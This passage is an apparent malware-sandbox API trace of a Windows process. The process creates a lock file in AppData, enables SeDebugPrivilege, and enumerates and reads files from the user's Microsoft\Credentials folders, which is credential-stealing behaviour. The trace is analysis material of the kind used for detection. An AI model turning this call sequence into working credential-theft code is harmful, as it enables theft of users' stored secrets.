returned 0x780000 [0319.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0319.214] GetProcessHeap () returned 0x780000 [0319.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b350 | out: hHeap=0x780000) returned 1 [0319.214] GetProcessHeap () returned 0x780000 [0319.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794fe8 | out: hHeap=0x780000) returned 1 [0319.214] GetProcessHeap () returned 0x780000 [0319.214] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b448 | out: hHeap=0x780000) returned 1 [0319.214] GetProcessHeap () returned 0x780000 [0319.214] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1388) returned 0x794fe8 [0319.215] GetProcessHeap () returned 0x780000 [0319.215] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x79ea08 [0319.215] GetProcessHeap () returned 0x780000 [0319.215] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d290 [0319.215] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0319.216] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79d290 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0319.216] GetProcessHeap () returned 0x780000 [0319.216] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x7a3bc8 [0319.217] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.218] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\%s", arglist=0x19f9e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0319.218] GetProcessHeap () returned 0x780000 [0319.218] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x79d780 [0319.218] GetProcessHeap () returned 0x780000 [0319.218] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.219] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0319.219] GetProcessHeap () returned 0x780000 [0319.219] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f50) returned 0x7a3bc8 [0319.220] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.220] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\%s.%s", arglist=0x19f9f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 55 [0319.220] GetProcessHeap () returned 0x780000 [0319.220] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797c10 [0319.220] GetProcessHeap () returned 0x780000 [0319.221] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.221] GetProcessHeap () returned 0x780000 [0319.222] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d780 | out: hHeap=0x780000) returned 1 [0319.222] GetProcessHeap () returned 0x780000 [0319.222] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.223] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 0 [0319.223] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0319.225] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0319.226] WriteFile (in: hFile=0x264, lpBuffer=0x19fbbc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19fb80, lpOverlapped=0x0 | out: lpBuffer=0x19fbbc*, lpNumberOfBytesWritten=0x19fb80*=0x1, lpOverlapped=0x0) returned 1 [0319.228] CloseHandle (hObject=0x264) returned 1 [0319.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.230] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb9c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fba4 | out: pSid=0x19fba4*=0x79e9c0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0319.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.231] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x79e9c0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fba8 | out: IsMember=0x19fba8) returned 1 [0319.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.232] GetCurrentProcess () returned 0xffffffff [0319.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.234] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19fba4 | out: TokenHandle=0x19fba4*=0x254) returned 1 [0319.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.235] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19fb9c | out: lpLuid=0x19fb9c*(LowPart=0x14, HighPart=0)) returned 1 [0319.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.247] AdjustTokenPrivileges (in: TokenHandle=0x254, DisableAllPrivileges=0, NewState=0x19fb8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0319.248] CloseHandle (hObject=0x254) returned 1 [0319.248] GetProcessHeap () returned 0x780000 [0319.248] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d290 [0319.248] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0319.249] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79d290 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0319.249] GetProcessHeap () returned 0x780000 [0319.249] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f70) returned 0x7a3bc8 [0319.250] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.251] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\Microsoft\\Credentials", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 59 [0319.251] GetProcessHeap () returned 0x780000 [0319.251] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79cab8 [0319.251] GetProcessHeap () returned 0x780000 [0319.251] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.252] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 1 [0319.252] GetProcessHeap () returned 0x780000 [0319.253] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.253] Sleep (dwMilliseconds=0xa) [0319.291] GetProcessHeap () returned 0x780000 [0319.291] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f48) returned 0x7a3bc8 [0319.292] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.293] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\*", arglist=0x19f904 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0319.293] GetProcessHeap () returned 0x780000 [0319.293] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x7a2798 [0319.293] GetProcessHeap () returned 0x780000 [0319.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.294] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x78d6c8 [0319.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.295] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0319.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.296] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0319.296] FindNextFileW (in: hFindFile=0x78d6c8, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0319.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.297] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0319.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.298] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0319.298] FindNextFileW (in: hFindFile=0x78d6c8, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0319.299] FindClose (in: hFindFile=0x78d6c8 | out: hFindFile=0x78d6c8) returned 1 [0319.299] GetProcessHeap () returned 0x780000 [0319.299] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2798 | out: hHeap=0x780000) returned 1 [0319.299] GetProcessHeap () returned 0x780000 [0319.299] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x7a3bc8 [0319.300] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.301] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0319.301] GetProcessHeap () returned 0x780000 [0319.301] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x7a2798 [0319.301] GetProcessHeap () returned 0x780000 [0319.301] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.301] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x78d2c8 [0319.302] FindNextFileW (in: hFindFile=0x78d2c8, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0319.302] FindNextFileW (in: hFindFile=0x78d2c8, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0319.302] FindClose (in: hFindFile=0x78d2c8 | out: hFindFile=0x78d2c8) returned 1 [0319.303] GetProcessHeap () returned 0x780000 [0319.303] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2798 | out: hHeap=0x780000) returned 1 [0319.303] GetProcessHeap () returned 0x780000 [0319.303] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79cab8 | out: hHeap=0x780000) returned 1 [0319.303] GetProcessHeap () returned 0x780000 [0319.303] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d290 [0319.304] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0319.305] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x79d290 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0319.305] GetProcessHeap () returned 0x780000 [0319.305] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f70) returned 0x7a3bc8 [0319.306] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.307] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\Microsoft\\Credentials", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 57 [0319.307] GetProcessHeap () returned 0x780000 [0319.307] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x76) returned 0x797890 [0319.307] GetProcessHeap () returned 0x780000 [0319.307] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.310] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 1 [0319.310] GetProcessHeap () returned 0x780000 [0319.310] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.311] Sleep (dwMilliseconds=0xa) [0319.357] GetProcessHeap () returned 0x780000 [0319.357] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f48) returned 0x7a3bc8 [0319.357] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.358] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\*", arglist=0x19f8ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0319.358] GetProcessHeap () returned 0x780000 [0319.358] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79cab8 [0319.358] GetProcessHeap () returned 0x780000 [0319.359] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.359] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x78d2c8 [0319.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.360] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0319.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.361] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0319.361] FindNextFileW (in: hFindFile=0x78d2c8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0319.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.362] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0319.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.363] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0319.363] FindNextFileW (in: hFindFile=0x78d2c8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0319.363] FindNextFileW (in: hFindFile=0x78d2c8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0319.364] FindClose (in: hFindFile=0x78d2c8 | out: hFindFile=0x78d2c8) returned 1 [0319.364] GetProcessHeap () returned 0x780000 [0319.364] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79cab8 | out: hHeap=0x780000) returned 1 [0319.364] GetProcessHeap () returned 0x780000 [0319.364] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x7a3bc8 [0319.365] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.365] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0319.365] GetProcessHeap () returned 0x780000 [0319.365] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79cab8 [0319.365] GetProcessHeap () returned 0x780000 [0319.366] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.366] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x78d3c8 [0319.366] FindNextFileW (in: hFindFile=0x78d3c8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0319.367] FindNextFileW (in: hFindFile=0x78d3c8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0319.367] GetProcessHeap () returned 0x780000 [0319.367] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x7a3bc8 [0319.367] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.368] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D") returned 90 [0319.368] GetProcessHeap () returned 0x780000 [0319.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb8) returned 0x7a2798 [0319.368] GetProcessHeap () returned 0x780000 [0319.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.369] StrStrW (lpFirst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpSrch="_dec") returned 0x0 [0319.369] GetProcessHeap () returned 0x780000 [0319.369] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4c) returned 0x7a3bc8 [0319.370] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.418] wvsprintfW (in: param_1=0x7a3bc8, param_2="%s_dec", arglist=0x19f670 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D_dec") returned 94 [0319.420] GetProcessHeap () returned 0x780000 [0319.420] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc0) returned 0x79a550 [0319.420] GetProcessHeap () returned 0x780000 [0319.421] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3bc8 | out: hHeap=0x780000) returned 1 [0319.421] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0319.423] GetFileSize (in: hFile=0x268, lpFileSizeHigh=0x19f654 | out: lpFileSizeHigh=0x19f654*=0x0) returned 0x2ac0 [0319.427] VirtualAlloc (lpAddress=0x0, dwSize=0x2ac0, flAllocationType=0x1000, flProtect=0x4) returned 0x1f0000 [0319.431] ReadFile (in: hFile=0x268, lpBuffer=0x1f0000, nNumberOfBytesToRead=0x2ac0, lpNumberOfBytesRead=0x19f650, lpOverlapped=0x0 | out: lpBuffer=0x1f0000*, lpNumberOfBytesRead=0x19f650*=0x2ac0, lpOverlapped=0x0) returned 1 [0319.437] CloseHandle (hObject=0x268) returned 1 [0319.441] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.443] GetProcessHeap () returned 0x780000 [0319.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0319.444] GetProcessHeap () returned 0x780000 [0319.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2798 | out: hHeap=0x780000) returned 1 [0319.446] FindNextFileW (in: hFindFile=0x78d3c8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0319.449] FindClose (in: hFindFile=0x78d3c8 | out: hFindFile=0x78d3c8) returned 1 [0319.488] GetProcessHeap () returned 0x780000 [0319.488] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79cab8 | out: hHeap=0x780000) returned 1 [0319.488] GetProcessHeap () returned 0x780000 [0319.489] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797890 | out: hHeap=0x780000) returned 1 [0319.490] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck")) returned 1 [0319.493] GetProcessHeap () returned 0x780000 [0319.493] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797c10 | out: hHeap=0x780000) returned 1 [0319.493] GetProcessHeap () returned 0x780000 [0319.494] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1388) returned 0x79b520 [0319.494] GetProcessHeap () returned 0x780000 [0319.494] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x79e930 